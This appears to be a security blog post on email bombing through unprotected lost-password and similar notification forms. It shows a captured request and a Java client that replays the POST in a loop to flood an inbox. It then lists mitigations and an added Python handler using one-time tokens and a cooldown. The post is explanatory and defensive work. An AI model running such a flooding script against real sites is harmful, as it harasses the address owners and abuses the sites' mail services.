Email notification service: Email Bomber

Nowadays almost every app has a module for notifying users through email. When that email module or service is written carelessly, it becomes open to serious misuse: an attacker can flood the inbox of any user whose address they know. Below is a test of a vulnerable web app, with an explanation.

Suppose the password reset functionality is vulnerable to email bombing.

URL: https://example.com/lost-password

Open it and you see a form that will notify you by email. Enter an email address and submit, while monitoring and capturing the request.

For this test I captured the following headers:

POST /lost-password HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://example.com/lost-password
Cookie: lang=en; xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1

POST data
action=send
email=test@test.com

Looking at the headers and body, we can see that there is nothing the web server could use to tie the request to a user or to verify that it came from the genuine form. So the same request can be replayed, with different POST data, from any HTTP client.

For example, the Java client below.


import java.io.DataOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

/**
 * @author Vaibs
 *
 */
public class TestEmail{

	private final String USER_AGENT = "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101/Vaibs/ Firefox/36.04";

	public static void main(String[] args) throws Exception {

		TestEmail http = new TestEmail();

		System.out.println("Testing email flooding - Send Http POST request");
		http.sendPost();

	}

	// HTTP POST request
	private void sendPost() throws Exception {

		// action URL of the lost-password form
		String url = "https://example.com/lost-password";

		URL obj = new URL(url);

		for (int i = 0; i < 10; i++) {
			// Send post request
			HttpURLConnection con = (HttpURLConnection) obj.openConnection();

			// add the basic request headers captured above
			con.setRequestMethod("POST");
			con.setRequestProperty("User-Agent", USER_AGENT);
			con.setRequestProperty("Accept-Language", "en-US,en;q=0.5");
			con.setRequestProperty("Upgrade-Insecure-Requests", "1");
			con.setRequestProperty("Connection", "keep-alive");
			con.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
			con.setRequestProperty("Accept-Encoding", "gzip, deflate, br");

			// payload
			String urlParameters = "action=send&email=test@test.com";

			con.setDoOutput(true);
			DataOutputStream wr = new DataOutputStream(con.getOutputStream());
			wr.writeBytes(urlParameters);
			wr.flush();
			wr.close();

			int responseCode = con.getResponseCode();

			System.out.println(i + "   -----    " + responseCode);
		}

	}

}

Likewise, I have seen several web apps letting attackers use their email service as a way to spam users' inboxes.

Typical vulnerable spots are the lost-password page, the "get the mobile app link" page and OTP functionality, among many others.

Below are the common ways to prevent this kind of spamming.

1. Captcha
2. Token exchange between client and server, so that only a request coming from the form the server just rendered is accepted.
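As an added example (not code from the original post), here is how a server-side handler for the lost-password form above could implement the token-exchange mitigation: the form is rendered with a one-time token bound to the session, and the POST handler consumes it, so the captured request cannot be replayed. It also adds a per-address cooldown, which the post does not list, because a one-time token alone only blocks replay of a captured request, not a client that fetches a fresh form before every submission. The in-memory stores, function names and 5-minute window are assumptions.

```python
import hmac
import secrets
import time
from urllib.parse import parse_qs

# Hypothetical in-memory stores (assumption); a real app would use its
# session store and cache. Keyed by session id and by normalised address.
SESSION_TOKENS = {}      # session_id -> one-time token issued with the form
LAST_SEND = {}           # email -> time the last reset mail was sent
COOLDOWN_SECONDS = 300   # at most one reset mail per address per 5 minutes


def issue_form_token(session_id):
    """Called when GET /lost-password renders the form: embed this token
    as a hidden field so only a client that loaded the form can submit."""
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token


def handle_lost_password(session_id, body, now=None, send_mail=lambda e: None):
    """Handle POST /lost-password with a body like
    'action=send&email=test@test.com&token=...'. Returns (status, reason)."""
    now = time.time() if now is None else now
    form = parse_qs(body)
    action = form.get("action", [""])[0]
    email = form.get("email", [""])[0].strip().lower()
    token = form.get("token", [""])[0]
    if action != "send" or not email:
        return 400, "bad request"
    # Token exchange: the token must match the one issued to this session,
    # and pop() consumes it, so replaying a captured request fails.
    expected = SESSION_TOKENS.pop(session_id, None)
    if expected is None or not hmac.compare_digest(expected.encode(), token.encode()):
        return 403, "missing or reused form token"
    # Per-address cooldown: repeats inside the window get the same generic
    # success response (no user enumeration) but trigger no further mail.
    last = LAST_SEND.get(email)
    if last is not None and now - last < COOLDOWN_SECONDS:
        return 200, "cooldown: no mail sent"
    LAST_SEND[email] = now
    send_mail(email)
    return 200, "mail sent"
```

Replaying the captured body `action=send&email=test@test.com` against this handler now yields a 403, and even a client that reloads the form each time gets at most one mail per address per window.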
